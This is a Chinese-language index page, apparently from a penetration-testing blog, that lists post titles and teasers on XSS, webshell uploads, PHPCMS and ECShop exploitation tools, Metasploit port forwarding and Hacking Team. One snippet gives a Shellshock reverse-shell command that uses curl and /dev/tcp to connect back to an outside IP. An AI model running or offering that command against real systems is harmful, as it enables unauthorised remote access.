团队里面有成员投稿了,这次带来的是xss高级攻击教程。 学员渗透录 二十五_XSS从初级到高级之基本概念篇
暗月asp木马溢出工具第二版
暗月asp木马溢出工具 第二版 此工具内部使用,不提供外部下载。有需要的同学,可以加入内部渗透测试 培训获取。
ssh+lcx实现Metasploit测试机没有公网IP时候的公网端口映射
在远程主机侦听127.0.0.1:4443 并转发到本机4444
Hacking Team:核心代码和数据未泄露,一切尽在掌控
本周一Hacking Team公司发标声明:核心代码和数据未泄露,一切尽在掌控。即便他们的监控软件源代码泄露,强大的技术优势也不会因此改变。
记一次aspx+KindEditor上传拿webshell
记一次aspx+KindEditor上传 拿webshell 作者:mOon 博客:www.mooonsec.com 0x01:前言
暗月ECSHOP综合利用工具
暗月ECSHOP综合利用工具 此工具不提供外部下载,内部已经共享。有需要的同学,加入我们的内部培训。
CVE-2014-6271反弹shell
curl -A "() { :;}; /bin/bash -i >& /dev/tcp/61.51.xx.xx/8080 0>&1" http...
PHPCMS后台低权限拿SHELL
PHPCMS 后台低权限拿SHELL 前提是需要有管理专题的权限 测试版本 PHPCMS 程序版本:Phpcms V9 .5.6 Release 20140522 过程 1. 添加...
XSS漏洞扫描器 – Xelenium
XSS漏洞扫描器 – Xelenium elenium是由owasp出品的一款安全测试工具,使用Java Swing编写,可以用来发现web应用中存在的安全漏洞 。 当前版本可以发...
渗透用的Python小脚本
0x00 渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
阿里峰会议题pdf分享
http://pan.baidu.com/s/1mg05n3E
告诉你们我是用意念在日站(渗透实战)
告诉你们我是用意念在日站(渗透实战) 作者:mOon 出处:www.moonsec.com 0x00:概述
1156